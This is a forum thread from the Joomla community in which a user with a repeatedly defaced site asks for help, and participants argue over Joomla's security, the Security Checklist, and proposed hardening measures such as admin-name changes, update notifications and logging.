Hacked AGAIN, reallly its getting retarded

[jgjh151]

How is it possible for someone to get into make changes to the database if the configuration.php is set to 444?

My site has no published forms to enter sql scripts. Templates index and css keep getting overwritten even thought the folder is st to 644. I'm not sure what else to do. Do I need to upgrade to latest version and have to do hours of work making sure the site is OK after the upgrade?

What else can I do on an old joomla site to make it safe?

[pe7er]

Please read:
You think you're site got hacked? Read this first, please!!!
Joomla Administrator's Security Checklist
List of Vulnerable 3rd Party/Non Joomla! Extensions
FAQ: Joomla! Permissions Overview


And a useful security analyzing tool: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/

[jgjh151]

I would install:

And a useful security analyzing tool: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/

BUT I can't even log into the site anymore. Seriously I don't want to spend hours reading all the links you've sent me, can't the whole process of keeping the site secure be more user-friendly? Perhaps all permissions sould be set right during installation and upgrading to your latest path or release would be a simple as clicking an update button in the admin?

[pe7er]

I would install:

And a useful security analyzing tool: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/

BUT I can't even log into the site anymore. Seriously I don't want to spend hours reading all the links you've sent me, can't the whole process of keeping the site secure be more user-friendly? Perhaps all permissions sould be set right during installation and upgrading to your latest path or release would be a simple as clicking an update button in the admin?

If you are not willing to invest some reading time yourself to secure your website,
then please do not expect other people to invest time in your problem....
This forum is here to help users to help themselves. But some reading is necessary.

Your suggestion about an update button in the admin sounds good, but I am not sure if it's possible (yet).

Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) is a tool, and not a Joomla component.
You don't need the Extension installer in Joomla's back-end to install it.
Please read the instructions at the description or in the package itself.

[rliskey]

This may seem harsh, but for what it's worth I hope you will appreciate the honesty. It is meant to be of service...

I loved Joomla when I first found it and quickly built about 10 nice client sites, but very soon most were hacked. I then spent months learning how to avoid this ever happening again, and even became a moderator of the Joomla Security Forums.

I collected everything I learned and shared it in a forum posting that became the semi-official Joomla Administrators Security Checklist (http://docs.joomla.org/Joomla!_Administ ... _Checklist). I also wrote most of the Security FAQs, and many other documents meant to help clean up the Joomla security mess.

Since then I've moved away from Joomla in preference for other open source projects that are led by people with the courage to be honest about real challenges and opportunities.Why? Because after all this effort the Joomla community is still clogged with users who are led to believe Joomla sites should be brain-dead easy. I fault the Joomla marketing program for leading new users astray. They fooled me too.

Sorry, but if you want to run a powerful web site, you need to learn how. It took me months of hard work to gather together the tidbits in the Security Checklist, and that's really only the beginning.

Good luck...

There are two kinds of pain:
1. The pain of hard work.
2.The pain of regret.

[jgjh151]

Thanks for taking the time to respond. I owe you guys an apology,
I was upset the sites got hacked.

One item I think might be helpful to people is for there to be some
info on how downloading and using a joomla site isn't for beginners and will
require hours of reading (as stated above) on how to
secure this application, like a warning before they invest hours
setting up numerous sites.

On this page, first heading: "Whats a CMS".
Realy, if you dont know this answer, should you be looking at Joomla?
http://www.joomla.org/about-joomla.html

[masterchief]

Because after all this effort the Joomla community is still clogged with users who are led to believe Joomla sites should be brain-dead easy. I fault the Joomla marketing program for leading new users astray. They fooled me too.

Soooo, are you saying there is a deliberate deception here, or that we should be making Joomla harder to use, or is it that the marketing is missing the mark, not completing the loop from installation to on-going maintenance? In either case, what would you change/implement/improve to not feel that people are being led astray?

[rliskey]

Soooo, are you saying there is a deliberate deception here,

Yes, I think it is deliberate, although I don't think it's malicious.

I think it's pretty fair to say that, given the unavoidable security issues for any dynamic Web system, Joomla is presented as easier to manage than it really is. See point 10 below for a PHP project that I think is more upfront about security issues.

or that we should be making Joomla harder to use?

Not a bad idea actually, and this is the method used by many other projects, including Drupal, Gallery2, and Typo3. For example, many have an installation step that requires the user to manually change the access permissions of a file on the server. This attempts to ensure at least a minimal familiarity with UNIX file permissions. Of course, Fantastico defeats that tactic--with obvious results.

or is it that the marketing is missing the mark, not completing the loop from installation to on-going maintenance?

Yes, I think that's the problem. Joomla has the install process down. The interface is a work of art, but that awesome easy-of-install does nothing to reduce the risks of running a real Web site over time. Users should be made aware of this before they get in too deep.

Presenting vital security information during the installation might be helpful. It's not enough to have a cryptic paragraph on the last page with a link to the forums. The information should be displayed to users in the same elegant way that proprietary applications present their propaganda (ads) during installs. Joomla's great interface designers could do a terrific job at this.

In either case, what would you change/implement/improve to not feel that people are being led astray?

OK. I understand that some of the following ideas may seem impractical or unpopular, and they eat into someone's time to implement, but you asked, and it's a fair question, so here's my best shot a some solutions...

1. Rename the warning notice on the extensions site from "Disclaimer" which sounds legalistic and boring to "WARNING", which more accurately describes this information. Move the notice from that low-visibility position at the bottom of the page to the very top. Also make the text larger, change the color from hard-to-read-gray to solid-black, add a bright red warning icon, and increase the font size to about 1 em. This disclaimer is probably the most blatant example of a deliberately underwhelming effort to share critical security information. There have been several requests over the years to make it more obvious.

2. Add critical security information with links to the sample content included with every new install.

3. Effectively double the security of the initial Super Administrator account by requiring the user to enter an admin name. In this way, we won't have tens of thousands of Joomla Super Administrator accounts all using the same name.

4. Strongly consider making the installation just hard enough to require at least some minimal level of server knowledge. You've done a great job with the installer, but it really does mislead new users into thinking everything else will also be that easy.

5. Ban all the parasites from the extensions directory who are illegally selling encrypted extensions on top of this GNU/GPL project. Encrypted code can't be analyzed or bug-fixed by the site owners. In the Open Source world that's inappropriate, and given PHP's problems with name space pollution, possibly dangerous. There's no way to analyze such code for bugs, Trojan Horses, or 'call home' functions.

6. Make it easier to move critical files and directories outside of public_html. I know J1.5 goes far in this direction, but I'd make it an explicit and recommended configuration option.

7. Add a more powerful logging system to the core. It would auto rotate/delete after so many days (configurable), the data would be stored in the database, which is typically the most secure location, and critical events would trigger a warning email to admin (configurable).

8. Develop an extension update system along the lines of Drupal's Update module, that automatically reports on outdated installed extensions and provides an easy 'Download Latest' button for each extension.

9. Refactor the file and directory structure to completely separate Joomla core code from contributed extensions, making it easier to check for suspicious changes in core files.

10. Adapt Gallery2's security documents which very thoroughly cover many of the same issues Joomla faces. The Gallery2 project makes no effort to hide real security issues. For example, they strongly encourage placing critical directories outside of public_html. See: http://codex.gallery2.org/Gallery2:Security

11. Develop a clear security reporting process to better track trends and to reduce noise in the forums. Here's an example from the Drupal project:
http://drupal.org/security-team

12. Add many more sanity checks to the installer script, such as the 'register_globals' check.

13. Consider adding some of the best security extensions to the core package, or at least include related example content with links. For example Joomla! Tools Suite:
http://extensions.joomla.org/component/ ... Itemid,35/

14. Make the JED Site Security section easier to find, and perhaps link it the about-to-be-renamed "WARNING" notice. It's currently buried two levels deep.
http://extensions.joomla.org/component/ ... Itemid,35/

15. Respect the intelligence of the users. Stop haranguing people not to ban IP addresses on the theory that such actions are always xenophobic or nationalistic. It's often a legitimate response for a site that serves a local area, a small organization, or a specific set of users. Provide powerful tools and complete information, and trust that more often than not people will use them wisely.

OK, I'm done. Hope some of that was useful.

[dtbcinci]

Guys I have been along time Joomla user, years, since the beginning it seems like, but you are killing me and my reputation with customers.

In less than three days I have had two of my sites hacked by someone. These are plain new installs of Joomla with no third party addons and the site has been hacked.

I have built sites for customers over the years with the old version of Joomla and never had a site hacked, maybe I was lucky, but since the new version has came out this makes the third site hacked.

Tha only thing is see in the forums is the developers blaming us users that we are not installing the latest patches or versions. What if you made doing a update a little easier and made it automatic instead of me coming back the Joomla site and seeing if updates have been released. Better yet why not just build Joomla so that it is bullet proof and maybe delay the release date to make sure it is bullet proof.

A few more hacks and I will start looking at other CMS's. Other scripts do not seem to have the same problems being hacked that Joomla does. My ISP does not like the fact that I run Joomla on a lot of my accounts. His words are "Joomla has too many securty holes and can easily be hacked".

If I could find the SOB doing the hacking I and tell him or her if they have a problem with Joomla to take it up with you guys and leave us users alone as are putting in hours and hours of work that they are blowing away in minutes, along with our reputations.

[adamos46]

Open a notepad and start writing a bulletproof CMS or contribute to the project. Even Redhat or Microsoft are not bulletproof. I think you talk non-sense. Open a book about webservers or RTFM and stop whining about Joomla. Every single open source project has flaws in the code. Deal with it.

p.s: If you dont like to read like you stated above, hire a professional to do your job easier.

[mbrown]

3. Effectively double the security of the initial Super Administrator account by requiring the user to enter an admin name. In this way, we won't have tens of thousands of Joomla Super Administrator accounts all using the same name.

I also like this idea of maybe having super admins or anyone with backend access to log in twice.

5. Ban all the parasites from the extensions directory who are illegally selling encrypted extensions on top of this GNU/GPL project. Encrypted code can't be analyzed or bug-fixed by the site owners. In the Open Source world that's inappropriate, and given PHP's problems with name space pollution, possibly dangerous. There's no way to analyze such code for bugs, Trojan Horses, or 'call home' functions.\

are you talking about those who purposefully create illegitimate extentions. As far as I know the extentions when sent to the joomla team are looked over and tested. If the case comes to the battle of some illegitmate extention it does not get added as far as i know

With the Trojan Horses and what not I still have to say that is a permission error or atleast it starts there. You can not give the world 777 permissions or something similar and think that your site will not get hacked. If you give a couple inches anyone and I mean anyone will take feet from you, if you get my point.

7. Add a more powerful logging system to the core. It would auto rotate/delete after so many days (configurable), the data would be stored in the database, which is typically the most secure location, and critical events would trigger a warning email to admin (configurable).

I do like the core having its own logging system. This way you know what is going on.

8. Develop an extension update system along the lines of Drupal's Update module, that automatically reports on outdated installed extensions and provides an easy 'Download Latest' button for each extension.

I think this has been discussed before and shot down. I may be wrong.

11. Develop a clear security reporting process to better track trends and to reduce noise in the forums. Here's an example from the Drupal project:
http://drupal.org/security-team

I am under the impression that is already exists for Joomla. It is called the JSST. Please read about it. JSST Also, Contacting the JSST

12. Add many more sanity checks to the installer script, such as the 'register_globals' check.

Doesn't the installer already check for things like this? Maybe making it so the recomended settings are manadtory but still....

13. Consider adding some of the best security extensions to the core package, or at least include related example content with links. For example Joomla! Tools Suite:
http://extensions.joomla.org/component/ ... Itemid,35/

I can not agree more. Maybe not the ones you have mentioned but the ones that can be added could be. Such as JoomlaWatch, etc.

15. Respect the intelligence of the users. Stop haranguing people not to ban IP addresses on the theory that such actions are always xenophobic or nationalistic. It's often a legitimate response for a site that serves a local area, a small organization, or a specific set of users. Provide powerful tools and complete information, and trust that more often than not people will use them wisely.

I have mixed feelings because of the fact that some of the people who visit the sites I maintain/administrate have their IPs never changed or change like once a month. So it is relatively easy for me to find out if they are back viewing things they should not be or anything like that. Banning IPs can be bad because IPs are leased so the person you want ban could have it one week and the other week someone else who you want to view your site could have it. I think we need a better banning system.

I do not mean to upset any Joomla Developer or what not. I think they definately have done an outstanding job since 1.0.x came out. This was perely a response to his reply.

Open a notepad and start writing a bulletproof CMS or contribute to the project. Even Redhat or Microsoft are not bulletproof. I think you talk non-sense. Open a book about webservers or RTFM and stop whining about Joomla. Every single open source project has flaws in the code. Deal with it.

p.s: If you dont like to read like you stated above, hire a professional to do your job easier.

I agree wtih you there, adamos46.
mbrown

[dtbcinci]

adamos46, nice to see that the Joomla board has a minature pit bull to jump on anyone that voices their opinion of what is wrong with Joomla. Shame that this board is like so many others in that if you don't sing the company theme song you are harassed. I guess this means I won't be getting into the Joomla Fan Club?

I agree with alot of what mbrown posted in his messages, but will anything be done, probably not. Joomla 1.5 was late being released from its first announced release date. While it works it also appears that the core team is writing patches and updates for many bugs or security holes that were missed in the original testing. Maybe 1.5 should have been held up longer until it was more secure.

Oh any by the way I have been an IT Admin/Network Eng. for 20 years and have worked my way through a great many systems and scripts over the years. My company network has never been hacked because the tools I use are bullet proof.

[Anarchyx67]

KUDOS to MBrown. I agree, Joomla should have a "hardened" version at least, the same way Linux server and other open source projects have. I'm very disappointed in the current state of Joomla with all these hack issues have occured. I would think it neccessary that the DEVs look at how the hacks are occuring, get it fixed and do an immediate patch to secure against it. THAT is what caring about a product involves.

This is assuming that the Security Checklist was followed. But my question then becomes, IF the security checklist is applied to a CURRENT VERSION install, are there still security issues?? Is the site still vulnerable to these hacks? Or is using the checklist on a current version install enough??

Truth please...

[adamos46]

dtbcinci: I am talking in general. Stop putting words in my mouth. If your server is secure and you apply some common sense security on joomla, script kidd0z cant touch your website. Security is a very dynamic environment, if you don't follow it, you will be lost. In those 20 years of experience, tell me one program that didn't have flows in the code. I can recall at least 7-8 years ago when you could get remote root from bind or remote execution on IIS 4 and these kind of attacks were the security issues back then. Now everything happens on the application level (RFI, LFI, sql injection, XSS). Start reading about WAF ex. modsecurity and learn how to block sql injection, prevent access to certain parts of your website and hide sensitive info from search agents. I am not trying to play smart ass but you should change your view on open source projects in general. If you are a businessman and you have clients that want 24/7 availability and be hack-less, start looking into proprietary software or learn how to do the right thing.

[mbrown]

dtbcinci: I am talking in general. Stop putting words in my mouth. If your server is secure and you apply some common sense security on joomla, script kidd0z cant touch your website. Security is a very dynamic environment, if you don't follow it, you will be lost. In those 20 years of experience, tell me one program that didn't have flows in the code. I can recall at least 7-8 years ago when you could get remote root from bind or remote execution on IIS 4 and these kind of attacks were the security issues back then. Now everything happens on the application level (RFI, LFI, sql injection, XSS). Start reading about WAF ex. modsecurity and learn how to block sql injection, prevent access to certain parts of your website and hide sensitive info from search agents. I am not trying to play smart ass but you should change your view on open source projects in general. If you are a businessman and you have clients that want 24/7 availability and be hack-less, start looking into proprietary software or learn how to do the right thing.

All right guys I know i am not a mod but still i think this topic is diverting from what it initially was posted concerning. please lets just the "pissing contest" and put the swords in the down position. Let's get back on topic of the indiviaul who initally posted concerning his website being hacked again.

[jgjh151]

Great ideas rliskey, really. Thank you for all your input, got people thinking.

[Anarchyx67]

Not trying to bump my pst, but concerned it got missed in the "contest" above...

"IF the security checklist is applied to a CURRENT VERSION install, are there still security issues?? Is the site still vulnerable to these hacks? Or is using the checklist on a current version install enough??"

Anyone? I'm concerned enough that I have pulled my own Joomla site down until I know for sure, because my hosting company is intolerant of hacked sites or sites with multiple "holes" thsat could allow successful hacking.

[fw116]

as i said for some time....

Joomla is not the problem of all the "I've been hacked!!" posts ...

the source is :

a) joomla, 3rd party tools and so on are not beeing updated for ages
b) no or simple knowledge from the site owner how to setup and secure a website
c) the same as b but for webserver and tools

thats it...


and that are the only reasons WHY joomla pages get hacked...

install a IPS
use htaccess
use fail2ban or similar tools
use regexp
use php.ini

but the most people here dont give a dam for security... and thats why we have so many problems here.

dont blame joomla.. blame yourself for the lack of knowledge...

[mbrown]

as i said for some time....
Joomla is not the problem of all the "I've been hacked!!" posts ...
the source is :
a) joomla, 3rd party tools and so on are not beeing updated for ages
b) no or simple knowledge from the site owner how to setup and secure a website
c) the same as b but for webserver and tools
thats it...
and that are the only reasons WHY joomla pages get hacked...
install a IPS
use htaccess
use fail2ban or similar tools
use regexp
use php.ini
but the most people here dont give a dam for security... and thats why we have so many problems here.dont blame joomla.. blame yourself for the lack of knowledge...

Thank you!

this is teh greatest post concerning this topic yet!!

[Anarchyx67]

I'm assuming the same holds true for those using shared web hosting services, except without the need <or ability> to use IPS, and the other server type tools mentioned?

[fw116]

using a shared hosting environment is like playing russian roulette.

don't use it.

[jgjh151]

as i said for some time....

Joomla is not the problem of all the "I've been hacked!!" posts ...

the source is :

a) joomla, 3rd party tools and so on are not beeing updated for ages
b) no or simple knowledge from the site owner how to setup and secure a website
c) the same as b but for webserver and tools

thats it...


and that are the only reasons WHY joomla pages get hacked...

install a IPS
use htaccess
use fail2ban or similar tools
use regexp
use php.ini

but the most people here dont give a dam for security... and thats why we have so many problems here.

dont blame joomla.. blame yourself for the lack of knowledge...

Makes sense, but then maybe the info page about joomla should say something like "Have a system admin/web site securty expert install and secure this application".

People are concerned about security (mostly when it's too late), but it's a beast in itself and majority of people installing this are not experts to say the least, and they dont think they need to be when they read about joomla.

PS, sorry about the title of the original post, funny.

[Anarchyx67]

I'm not so concerned about professional shared hosting, most bigger companies do secure their servers pretty well, as they don't want hacked sites, etc. What I am concerned more about, is the security of the platform I put on the shared hosting. That of course means the DEV staff have to be willing to do everything they can to secure the platform as it's installed if not before.

As for the security checklist, I see things the Joomla DEV staff could be doing that would reduce the load on the end user. Yes, I understand this is open source. But take some responsibility for the application you are developing, from a security standpoint. Don't make your users do it all.

IMHO...

[ircmaxell]

As for the security checklist, I see things the Joomla DEV staff could be doing that would reduce the load on the end user.

Could you please elaborate on this? You have my attention...

[willebil]

You know, I don't mean any disrespect, but I had to chuckle by the question "Is Joomla! not safe?" since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?" and he's so desperate to get the Dentist to stop that he says Yes or No or What do you want to hear? http://www.[youtube].com/watch?v=CZ4sTEvx2Bk

I would say - anyone who tells a community that a Web site or a out of the box solution is safe is not being responsible. No, it is not "safe" on the Internet.

What people need to do is pay close attention to how projects respond to security crisises? Are they responsive? Truthful? Do they provide fixes and explanations? Are they forthright? or hiding things?

At Joomla!, we are making big improvements in security. This year, we had one major security issue come up, which is not bad considering we have only had the source code out since January. It took the Joomla! Bug Squad 1,5 hours to identify the problem and create and distribute a patch. Following that issue, a team was formed (http://developer.joomla.org/security.html) and that team's goal is to find vulnerabilities, evaluate the seriousness and fix them all.

The Joomla! development team (it's almost hard to explain this is a different team then the core team) is not responsible for the security of 3rd party extensions, we can only provide guidance on how to build safe extensions. We also cannot be responsible for the security of you website, again we can only provide guidance. As referred earlier on, visit the documentation site. A final note; if you want to run a professional site, please handle the maintaince and security of that site professionally. If you don't have the time or skills, ask a provider of professional services who can help you.

[mbrown]

well said!

[RussW]

OK, let's see if some "clarity" can be found here, whilst also answering the initial query;

"IF the security checklist is applied to a CURRENT VERSION install, are there still security issues?? Is the site still vulnerable to these hacks? Or is using the checklist on a current version install enough??"

• Yes, the Security Checklist will assist greatly in securing your site.
• Yes, upgrading to the latest release will assist greatly in securing your site
• Yes, vulnerabilities are still likely to be found in the future
• No, any checklist is not enough to guarantee the result you are looking for

Not quite the answer I am sure you or others are looking for, but it's not spin doctored or masking anything. Ultimately, there are too many external factors to Joomla! to ensure 100% success, including the ever present threat of currently unknown vulnerabilities or undiscovered flaws in OS's/PHP/MySQL/WebServers/Networking/Joomla!/Extensions/Templates

Anyone? I'm concerned enough that I have pulled my own Joomla site down until I know for sure, because my hosting company is intolerant of hacked sites or sites with multiple "holes" thsat could allow successful hacking.

Do you drive a car, ride a bike or walk the streets? Have you stopped doing any of these things because there was an accident yesterday? I hardly think so.

If you or your host, more importantly, have chosen to be that short sighted then maybe it is time that another career was selected, sorry to be rude, but you hosts comments show a serious lack of understanding of the environment they work within. Yes, Joomla! has been and will continue to be compromised, as will any application (commercial or Open Source). No, you will never be sure that you wont fall foul of the next exploit, if it was a sure bet, everyone would be doing it and the world would be a very bland place, thats why we all have different jobs, hobbies and interests, because we are all different and not all equal in skill and ability in all area's.

Let's try and take some perspective here;

Looking through the forum, I note that on average over the last month, there have been, lets say 10 "I've been hacked" reports a day.

So lets do some simple maths, 10x (assume 30 days a month) 30 days, thats 300 (assuming unique) sites a month compromised.

Lets now assume that the reported exploits are only 25% of the actual activity, so that makes 1200 sites a month.

OMG....!!!! If I also asusme that these are all on unique servers, thats 1200 potentially insecure servers or poorly configured servers or heaven forbid, thats 1200 hosts that shouldn't be in the hosting business..!!!! Now, that is a scary thoguht..!!)

Now lets look at the installations, again looking through the installation forum and making similar assumptions. I see about 100 posts a day for new install queries, so, 100 x 30 gives me 3000 new sites a month, and again apply the 25% rule, totaling 12,000 sites a month.

So, the "I've been hacked" sites is only 10% of all new installations, and this doesn't take in to account all those existing installations which are not compromised.

In my eye's, that's a pretty impressive track record considering the capabilities of the application, and the skill sets of much of the community being non-IT based folks.

Now, lets dig a little deeper still. Out of the I've been hacked" sites (which to be truthful, it's not "hacked" it's exploited, defaced or compromised, if you had actually have been "hacked" then you would be in the forums asking for help, most likely your complete server would be comprised with no chance of recovery without a rebuild.) lets assume that 30% of these have been due to incorrect permissions configuration, another 30% is due to poor server/PHP configurations and 15% was due to outdated or insecure Joomla! or Extensions. that still only then leaves, 25% of the posts actually being possibly due to code flaws, which in the above maths equates to 300 sites actually successfully compromised through a code issue or over-sight. Hmmmm, again lets go to the maths;

• 300 compromised sites
• 12,000 new installations

Thats 2.5% of new installations compromised, not to mention the current non-compromised install base out there. Compare that to publicised commercial application expoits, it's minimal, and Open Source projects do not control the installation environment, unlike many/some commercial vendors do, ensuring a more stable installation environment.

This is not to say that more cannot be done or isn't being done, but site owners, developers, designers and administrators need to accept that their sites are ultimately their responsibility and they have the choice whether to use a particular application or not, use a particular host or not and how much effort they put in to learning the environment they have chosen to work or play within.

With the greatest respect for many of the posters in this thread, it is always good to hear from Ron (good to see you again, btw), FW and Andrew and always a worthwhile and learning experience for me, I do think that there are valid points on both sides of the discussion, but I do also think that there are a few barriers to implementation of some of Ron's thoughts and that there is still further to go with respects to the security and functionality mix within many Open Source projects, not discounting Joomla! The JSST is a great step forward, Feedburner Security updates i beleive is long overdue, but here now and I am absolutely positive that Security is never far from the minds of many, if not all of the core team member, especially Andrew and Anthony, who I am aware are very active in this area and have employed the help of several other well respects experts to further develop this area.

[brad]

Feedburner Security updates i beleive is long overdue

Let me just post the link so no one misses it: http://feeds.joomla.org/JoomlaSecurityNews

[masterchief]

Wow, things have got lively

@rliskey - thanks for your comments. I agree with some and disagree with others.

While you find this a criticism of the project, the ease of use is actually one thing that sets it apart from others, and hence contributes to why people use it. People like "easy to use". People like convenience, even though most packaging these days displays warnings and such that few read. If people read warning labels then there would be no tobacco industry. There is actually a lot of information out there - but probably not presented in the best way. However, people will still choose to ignore it despite our best endeavours. Some people just don't care.

Ironically most of your points are easy to solve or or being planned or already implemented, so I'm still left wondering if there is a deeper root issue here. Anyway.

1. Rename the warning notice on the extensions site from "Disclaimer" which sounds legalistic and boring to "WARNING",

Not a bad suggestion, I'll pass it on the JED people.

2. Add critical security information with links to the sample content included with every new install.

Brilliant! Would you be willing to prepare the patch to the sample content.

3. Effectively double the security of the initial Super Administrator account by requiring the user to enter an admin name.

We are refactoring the installation for 1.6 right now. I'll put that feature on the list. If someone wants to do a patch for 1.5 I'm sure the bug squad would seriously consider it for inclusion in 1.5.8.

4. Strongly consider making the installation just hard enough to require at least some minimal level of server knowledge.

Here's where I disagree. I think it's complex and daunting enough for the uninitiated.

5. Ban all the parasites from the extensions directory who are illegally selling encrypted extensions on top of this GNU/GPL project.

GPL compliance is an ongoing work but really, while a valid point, it's part of a very different discussion.

6. Make it easier to move critical files and directories outside of public_html.

This work is ongoing.

7. Add a more powerful logging system to the core.

More powerful that what? JLog is already there and we have plugins that can fire on various triggers. Maybe your point is add more triggers in "X, Y, Z" locations to be able to log those things?

8. Develop an extension update system along the lines of Drupal's Update module

That's a good goal. 1.6 will lay some more foundation work that will one day allow that to be a reality.

9. Refactor the file and directory structure to completely separate Joomla core code from contributed extensions

I'm actually not a big fan of that. You have to have a certain level of knowledge to detect suspicious changes regardless of the file tree. I see your point but I don't think the effort delivers a significant gain because people still have to know what they are looking at and looking for.

10. Adapt Gallery2's security documents which very thoroughly cover many of the same issues Joomla faces.

I'm all for cheating, but going back to my earlier points - some people don't care about the fine print and don't want to read the manual.

11. Develop a clear security reporting process to better track trends and to reduce noise in the forums. Here's an example from the Drupal project:

JSST

12. Add many more sanity checks to the installer script, such as the 'register_globals' check.

Huh? We deliberately (with extreme prejudice) made 1.5 immune to the server register_globals setting. Did you not know that? See JRequest::clean (I think that's the one). We can't rely on the server settings so we nuke all the globals very early on in the core execution.

13. Consider adding some of the best security extensions to the core package

But what you've done is point out that one (or more) is/are available at present. Do all people know about them? No. I also think admin based security panels have a limited boundary of effectiveness. Case in point is the one that checks whether things are up to date or not. You have to log in to find out that your Joomla site is out of date - oh wait, I can't log in because it's just been hacked. A much better approach is for a service to exist that pings a site, upgrades it while you are sleeping and sends you an SMS when done.

14. Make the JED Site Security section easier to find

As you will have seen, all the joomla.org family of sites are being reworked. I'm sure this can be taken into account when it's the JED's turn.

15. Respect the intelligence of the users.

And respect their stupidity and laziness. There is no black and white answer here, just differences of opinion.

A final comment on ease of use. One of the unwritten goals of the project for many years was to put the web within the reach of people who don't know much about the web. Joomla is built of stories of wives being able to keep friends and family appraised of a seriously injured husband, of local communities rallying together to knock up a web site quickly and easily to raise money for life-saving surgery, and remote third-world areas being able to set up and run their own website without a lot of prior learning. The "deliberately" complex systems, like Typo3, can't do that. T3 and others in it's ilk are deliberately pitched at a level of expertise. So is Joomla - it's just a lot lower. Does that cause issues? Heck yeah. Support increases (because you have to deal with people who are not tech savvy) but whether it's T3 or Drupal or Joomla, the attention to detail on security issues has to be the same. None of them are perfect (in fact, if you ever find a piece of software that guarantees it is 'bullet proof' - run away, run away very fast - they probably don't know what they are doing).

I'll be the first to agree that on the post-implementation side of things, we could do a better job. However, to suggest we are deliberately doing nothing because we want to keep it that way is really unwarranted. We can do better - most certainly (<insert std call for volunteers to make it happen - bla bla bla>) - but if you look over this year you'll see many, many changes, I believe, in the right direction.

Anyway, once again, thanks for your comments. There is some food for thought there and some things we can act on (or already have in the pipeline). On the areas where we disagree, well, frankly, the wonderful thing is we have many systems to choose from and the right one for you, is the right one for you. Some choose T3, others Drupal, and on the odd occasion someone comes across Joomla. I know those other projects have dedicated teams supporting those projects and also wrestling with the same problems that we do. But when you do find the project that fits like a glove, by heck put your heart and soul into supporting it. That's all any of them would ask.

And absolute last:

Let me just post the link so no one misses it: http://feeds.joomla.org/JoomlaSecurityNews

^^ what Brad said. Get onto the security RSS feed - it could save your site.

[mbrown]

your point to 13 i really like there masterchief!